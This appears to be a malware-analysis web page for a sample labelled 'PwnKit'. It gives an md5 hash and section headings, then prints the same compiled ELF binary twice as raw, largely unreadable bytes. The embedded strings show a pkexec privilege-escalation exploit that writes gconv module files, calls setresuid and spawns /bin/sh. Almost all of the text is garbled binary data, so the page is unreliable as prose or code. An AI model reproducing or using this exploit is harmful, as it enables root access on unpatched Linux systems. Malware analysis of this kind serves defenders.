PHP Malware Analysis

PwnKit

md5: a63eb43c6c694570f4aca391b8111439

Jump to: 

Screenshot
Attributes
Emails

Deobfuscated PHP code
ELF>@x=@8
@$#@@@���!�!�!@@��   ��.>>��.>>��00HHH$$S�td00P�td�!�!�!<<Q�tdR�td.>>�� GNU��GNU�I)^�
�1<^Zo(*h�GR+ ��"!"�
�V�`c5�R�|q�|{��)��n �����&�������� ��u�, F"��U�!�ab
i9|�+d�=__gmon_start___ITM_deregisterTMCloneTable_ITM_registerTMCloneTable__cxa_finalizeservice_interpunlink_cbremoveperrorrmrfnftwentrymkdir__errno_location_exitcreatfopenfputsfclosereadlinksymlinkpipeforkreadstrstrdup2memcpyexecveexecvpegconvgconv_initgetenvsetresuidsetresgidlibc.so.6GLIBC_2.14GLIBC_2.11GLIBC_2.3.3GLIBC_2.2.50���:���Esi	Pui	\>�>@�@�@�?�?�?#�?�?@ @(@0@8@@@H@P@"X@	`@
h@p@x@
�@�@�@�@�@�@�@�@�@�@�@�@�@��H��H��/H��t��H����5�/�%�/@�%�/h����%�/h�����%�/h����%�/h����%�/h����%�/h����%�/h����%�/h�p����%�/h�`����%�/h	�P����%�/h
�@����%�/h�0����%�/h� ����%z/h
�����%r/h�����%j/h���%b/h����%Z/h�����%R/h����%J/h����%B/h����%:/h����%2/h����%*/h�p����%"/h�`����%/h�P���H�=/H�/H9�tH��-H��t	�����H�=�.H�5�.H)�H��H��?H��H�H�tH��-H��t��fD�����=�.u3UH�=�-H��t
H�=�.��-�c����|.]�f.��ff.�@���g���UH��H��0H�}�H�u�U�H�M�H�E�H������E��}�tH�E�H������E���UH��H��H�}�H�E��	�@H�5�,H���A�����UH��H��pdH�%(H�E�1�H��@����H��H��H������H��H���7������������u%�����tH��H�����������H��H������������H��H����������H��H��H��H�����H����H����uH�|H�������|���H����H��H�{H��������yH��H���p�����F���H����H�����H�����H��H�iH���Y���Ƅ��H����H�ZH��H��������������uH�KH����������H����H�������������������g�������H������H�Ή��k���Ƅ��H����H��H��H�����H��H����H9�u-H��H���l���H��
H���m���H�H���^�����$��������������������������������HDž������~0H����H��H�H���H�
�H��H�����H����HDž��H�o
H����H�XH����H�\H����H�]H����H����H����HDž��H����H����H��H�2H���(���H����H����H��H�"H����������UH��]�UH��H��PdH�%(H�E�1��������W���H��
H�����H�E���������������H�%	H�����H�S	H�����H�}�tCH�}
H�E�H�z
H�E�H�E�H�E�H�E�H�EкH��H�K
H���&����\H�E
H�E�H�E�H�E��H��H�)
H�����H�
H�E�H�E�H�EкH��H��	H�������������H��H���GCONV_PATH=.Failed to create directoryGCONV_PATH=./.pkexec.pkexecw+.pkexec/gconv-modulesFailed to open output filemodule UTF-8// PKEXEC// pkexec 2Failed to write config/proc/self/exe.pkexec/pkexec.soFailed to copy filepkexec --versionExploit failed. Target is most likely patched.CMD=PATH=GCONV_PATH=.CHARSET=pkexecSHELL=pkexec/usr/bin/pkexecpkexecCMD/bin/sh-c-i/bin/bash/lib64/ld-linux-x86-64.so.2;8d�T��|�E������zRx�$��FJw�?;*3$"DY�=A�C
xdv�+A�C
f���aA�C
���A�C
B���9A�C
�@0
�>>���op�
h@p�		�	���o����o�ox���o>6FVfv��������&6FVfv������@GCC: (GNU) 12.1.0<�<#�4�g-@4�U%U%c.�
--	?LLu=/	��K^.�
44	'K	�+K../sysdeps/x86_64/crti.S/build/glibc/src/glibc/csuGNU AS 2.38../sysdeps/x86_64/crtn.S/build/glibc/src/glibc/csu../sysdeps/x86_64crti.Scrtn.S����!@7�@C>j�v>�����"��
���@�>��!��@�@>
�!>Q m2��+�����!��
1�CTedax ��b��=���� �"&9i9crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryPwnKit.c__FRAME_END___fini__dso_handle_DYNAMIC__GNU_EH_FRAME_HDR__TMC_END___GLOBAL_OFFSET_TABLE_getenv@GLIBC_2.2.5nftw@GLIBC_2.3.3__errno_location@GLIBC_2.2.5remove@GLIBC_2.2.5_ITM_deregisterTMCloneTable_exit@GLIBC_2.2.5mkdir@GLIBC_2.2.5rmrfreadlink@GLIBC_2.2.5setresuid@GLIBC_2.2.5fclose@GLIBC_2.2.5service_interpsetresgid@GLIBC_2.2.5dup2@GLIBC_2.2.5execvpe@GLIBC_2.11symlink@GLIBC_2.2.5fputs@GLIBC_2.2.5pipe@GLIBC_2.2.5read@GLIBC_2.2.5execve@GLIBC_2.2.5__gmon_start__memcpy@GLIBC_2.14gconvunlink_cbfopen@GLIBC_2.2.5perror@GLIBC_2.2.5creat@GLIBC_2.2.5_ITM_registerTMCloneTable__cxa_finalize@GLIBC_2.2.5fork@GLIBC_2.2.5strstr@GLIBC_2.2.5gconv_init.symtab.strtab.shstrtab.note.gnu.property.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.interp.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.got.plt.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str.debug_line_str.debug_rnglists0.HH$A���opp<K��`Sh[���oxxHh���o��Pw		��B�	�	p��  ��������
�  ���!�!��!�!<��!�!��>.�>.�>.���?�/(�@0���@�0��@�0�0�01��1F#�1$1�1�=0�2YH03;XW3B�3("	�8D<h
Execution traces
Generated HTML code
<html><head></head><body></body></html>
Original PHP code
ELF>@x=@8
@$#@@@���!�!�!@@��   ��.>>��.>>��00HHH$$S�td00P�td�!�!�!<<Q�tdR�td.>>�� GNU��GNU�I)^�
�1<^Zo(*h�GR+ ��"!"�
�V�`c5�R�|q�|{��)��n �����&�������� ��u�, F"��U�!�ab
i9|�+d�=__gmon_start___ITM_deregisterTMCloneTable_ITM_registerTMCloneTable__cxa_finalizeservice_interpunlink_cbremoveperrorrmrfnftwentrymkdir__errno_location_exitcreatfopenfputsfclosereadlinksymlinkpipeforkreadstrstrdup2memcpyexecveexecvpegconvgconv_initgetenvsetresuidsetresgidlibc.so.6GLIBC_2.14GLIBC_2.11GLIBC_2.3.3GLIBC_2.2.50���:���Esi	Pui	\>�>@�@�@�?�?�?#�?�?@ @(@0@8@@@H@P@"X@	`@
h@p@x@
�@�@�@�@�@�@�@�@�@�@�@�@�@��H��H��/H��t��H����5�/�%�/@�%�/h����%�/h�����%�/h����%�/h����%�/h����%�/h����%�/h����%�/h�p����%�/h�`����%�/h	�P����%�/h
�@����%�/h�0����%�/h� ����%z/h
�����%r/h�����%j/h���%b/h����%Z/h�����%R/h����%J/h����%B/h����%:/h����%2/h����%*/h�p����%"/h�`����%/h�P���H�=/H�/H9�tH��-H��t	�����H�=�.H�5�.H)�H��H��?H��H�H�tH��-H��t��fD�����=�.u3UH�=�-H��t
H�=�.��-�c����|.]�f.��ff.�@���g���UH��H��0H�}�H�u�U�H�M�H�E�H������E��}�tH�E�H������E���UH��H��H�}�H�E��	�@H�5�,H���A�����UH��H��pdH�%(H�E�1�H��@����H��H��H������H��H���7������������u%�����tH��H�����������H��H������������H��H����������H��H��H��H�����H����H����uH�|H�������|���H����H��H�{H��������yH��H���p�����F���H����H�����H�����H��H�iH���Y���Ƅ��H����H�ZH��H��������������uH�KH����������H����H�������������������g�������H������H�Ή��k���Ƅ��H����H��H��H�����H��H����H9�u-H��H���l���H��
H���m���H�H���^�����$��������������������������������HDž������~0H����H��H�H���H�
�H��H�����H����HDž��H�o
H����H�XH����H�\H����H�]H����H����H����HDž��H����H����H��H�2H���(���H����H����H��H�"H����������UH��]�UH��H��PdH�%(H�E�1��������W���H��
H�����H�E���������������H�%	H�����H�S	H�����H�}�tCH�}
H�E�H�z
H�E�H�E�H�E�H�E�H�EкH��H�K
H���&����\H�E
H�E�H�E�H�E��H��H�)
H�����H�
H�E�H�E�H�EкH��H��	H�������������H��H���GCONV_PATH=.Failed to create directoryGCONV_PATH=./.pkexec.pkexecw+.pkexec/gconv-modulesFailed to open output filemodule UTF-8// PKEXEC// pkexec 2Failed to write config/proc/self/exe.pkexec/pkexec.soFailed to copy filepkexec --versionExploit failed. Target is most likely patched.CMD=PATH=GCONV_PATH=.CHARSET=pkexecSHELL=pkexec/usr/bin/pkexecpkexecCMD/bin/sh-c-i/bin/bash/lib64/ld-linux-x86-64.so.2;8d�T��|�E������zRx�$��FJw�?;*3$"DY�=A�C
xdv�+A�C
f���aA�C
���A�C
B���9A�C
�@0
�>>���op�
h@p�		�	���o����o�ox���o>6FVfv��������&6FVfv������@GCC: (GNU) 12.1.0<�<#�4�g-@4�U%U%c.�
--	?LLu=/	��K^.�
44	'K	�+K../sysdeps/x86_64/crti.S/build/glibc/src/glibc/csuGNU AS 2.38../sysdeps/x86_64/crtn.S/build/glibc/src/glibc/csu../sysdeps/x86_64crti.Scrtn.S����!@7�@C>j�v>�����"��
���@�>��!��@�@>
�!>Q m2��+�����!��
1�CTedax ��b��=���� �"&9i9crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryPwnKit.c__FRAME_END___fini__dso_handle_DYNAMIC__GNU_EH_FRAME_HDR__TMC_END___GLOBAL_OFFSET_TABLE_getenv@GLIBC_2.2.5nftw@GLIBC_2.3.3__errno_location@GLIBC_2.2.5remove@GLIBC_2.2.5_ITM_deregisterTMCloneTable_exit@GLIBC_2.2.5mkdir@GLIBC_2.2.5rmrfreadlink@GLIBC_2.2.5setresuid@GLIBC_2.2.5fclose@GLIBC_2.2.5service_interpsetresgid@GLIBC_2.2.5dup2@GLIBC_2.2.5execvpe@GLIBC_2.11symlink@GLIBC_2.2.5fputs@GLIBC_2.2.5pipe@GLIBC_2.2.5read@GLIBC_2.2.5execve@GLIBC_2.2.5__gmon_start__memcpy@GLIBC_2.14gconvunlink_cbfopen@GLIBC_2.2.5perror@GLIBC_2.2.5creat@GLIBC_2.2.5_ITM_registerTMCloneTable__cxa_finalize@GLIBC_2.2.5fork@GLIBC_2.2.5strstr@GLIBC_2.2.5gconv_init.symtab.strtab.shstrtab.note.gnu.property.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.interp.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.got.plt.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str.debug_line_str.debug_rnglists0.HH$A���opp<K��`Sh[���oxxHh���o��Pw		��B�	�	p��  ��������
�  ���!�!��!�!<��!�!��>.�>.�>.���?�/(�@0���@�0��@�0�0�01��1F#�1$1�1�=0�2YH03;XW3B�3("	�8D<h